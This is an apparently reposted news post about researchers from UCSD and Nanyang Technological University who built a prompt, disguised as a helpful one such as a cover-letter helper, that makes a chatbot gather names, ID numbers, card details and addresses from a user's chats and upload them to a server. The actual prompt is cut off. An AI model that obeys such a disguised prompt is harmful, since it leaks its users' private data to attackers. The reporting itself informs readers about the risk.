This post was originally published on this site.
I told you from the early days of ChatGPT that you should avoid giving the chatbot data that’s too personal. First, companies like OpenAI might use your conversations with the AI to train future models. You don’t want any personal data in there.
Then there’s the risk of hacks targeting your chatbot. Hackers might find ways to target your chats with cleverly crafted prompts that will instruct the AI to feed them personal data from your interactions with the program.
A team of researchers managed to pull off the latter, creating a prompt that would instruct a chatbot to collect data from your chats and upload them to a server. The best part about the hack is that you’d input the prompt yourself, thinking that you’re actually using some sort of advanced prompt to help you with a specific task.Â
For example, hackers can disguise malicious prompts as prompts to write cover letters for job applications. That’s something you might search the web yourself to improve the results from apps like ChatGPT.
According to Wired (via 9to5Mac), the attack was the result of a joint collaboration between researchers from the University of California, San Diego (UCSD) and Nanyang Technological University in Singapore.
The researchers crafted a prompt that tells the AI to extract personal data, including names, ID numbers, credit card details, email addresses, mailing addresses, and other personal data, from the target’s chats with a chatbot.
The prompt looks like this when seen in plain English: